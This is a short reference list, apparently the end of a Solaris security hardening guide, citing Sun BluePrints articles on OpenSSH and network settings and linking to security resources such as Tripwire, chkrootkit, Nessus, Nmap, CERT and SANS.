http://builder.cnet.com/webbuilding/0-7532-8-4561014-1.html?tag=st.bl.7532.edt.
7532-8-4561014, January 25, 2001.
Reid, Jason M and Watson, Keith. Building and Deploying OpenSSH in the Solaris
Operating Environment, Sun BluePrints OnLine, July 2001.
Watson, Keith and Noordergraaf, Alex. Solaris Operating Environment Network
Settings for Security: Updated for the Solaris 8 Operating Environment, Sun BluePrints
OnLine, December 2000.

网址：
> Sun BluePrints OnLine: http://sun.com/blueprints
> TripWire: http://www.tripwire.com
> Chkrootkit: http://www.chkrootkit.org/
> Nessus: http://www.nessus.org
> NMap: http://www.nmap.org
> SecurityFocus: http://www.securityfocus.com
> CERT: http://www.cert.org
> SANS Institute: http://www.sans.org
> SunSolve: http://sunsolve.sun.com